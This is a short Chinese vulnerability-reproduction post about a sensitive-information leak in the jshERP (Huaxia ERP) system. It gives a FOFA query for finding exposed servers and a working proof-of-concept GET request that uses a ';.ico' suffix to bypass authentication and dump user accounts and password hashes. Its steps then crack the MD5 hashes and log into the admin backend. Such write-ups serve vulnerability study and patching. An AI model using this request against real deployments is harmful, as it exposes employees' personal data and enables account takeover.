华夏ERP信息泄露漏漏洞复现 [附POC]

0x01 前言

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

0x02 漏洞描述

jshERP立志为中小企业提供开源好用的ERP软件，降低企业的信息化成本，目前专注进销存+财务功能。主要模块有零售管理、入库管理、出库管理、组装拆卸、财务管理、报表查询、基础数据、系统管理等。支持预付款、收入支出、仓库调拨、采购销售、礼品卡等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面，精确到每个按钮和菜单。

该系统存在敏感信息泄露漏洞，通过此漏洞攻击者可以获取系统用户，登录用户名，密码，职位等个人敏感信息。

0x03 影响版本

华夏ERP

0x04 漏洞环境

FOFA语法： body=“jshERP-boot”

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC （GET）

GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: ip:port
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-GB;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: */*

3.复现

发送数据包
Md5解密，登录后台

0x06 修复建议

目前官方暂未发布安全版本修复此漏洞，建议联系厂商获取加固建议

补丁链接：https://www.huaxiaerp.com/